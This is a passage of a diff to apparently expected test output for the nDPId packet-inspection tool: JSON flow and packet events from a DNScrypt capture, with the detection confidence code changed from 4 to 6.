AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":562,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400522} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":562,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAABQaQwAuX4Rb\/AKAAABTUJU6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAXcaQ0gAH4RSxwKAAABTUJU6d8VAbsGBEgCsp0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":564,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400522} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":564,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAABQaQ0AuX4Rb+8KAAABTUJU6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":946739400522,"pkt":"ZmZmZmZmRERERERECABFAADQoa1AADYRp\/25wX\/0CgAAAQG7tOoAvNxR\/I6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAANT+QyCeqOpvY3ek9vOTVGrWy3oc27D9SS491oCJRe7RQWKb3q0aPb33Ziq0RP9PPCzRMBy1lW3l6rz74jWgmwszJtIbCS+4i64Fme9c0vB4hxz+sKp41i8d9KRbhVFMbjMm0hsJL7iLAAAAAV9TV8BfVKlA"} @@ -1147,26 +1147,26 @@ 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":946739400553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":946739400553,"pkt":"ZmZmZmZmRERERERECABFAADcDmwAADYREr5NQlTpCgAAAQG73xUAyIPxsp2BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAAHTELXM+13EPB+IE+zJ9PQOXdJ7IKBJfAx72Wd7gihP8hRGtsF77cDm0yhz652JqAFc0tI+h6KATFWPKnD7HPQCiR1MNmirJFbpEf5fuBV5xkfCiHCm163IIgp4yvCcsa6NHUw2aKskVX1OfeV9Tn3lfVPD5"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402187,"flow_last_seen":946739402187,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":946739402187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739402187,"pkt":"REREREREZmZmZmZmCABFAAIc1vJAAH4RAOYKAAABF29KzejDAbsCCCUSS8MBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402187,"flow_last_seen":946739402187,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402187,"flow_last_seen":946739402187,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAIc1vNAAH4RAOUKAAABF29Kze20AbsCCCUSS8UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAIc1vRAAH4RAOQKAAABF29Kza75AbsCCCUSS8cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAXc1vYgAH4RHSIKAAABF29Kzc81AbsGBMTJS8YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA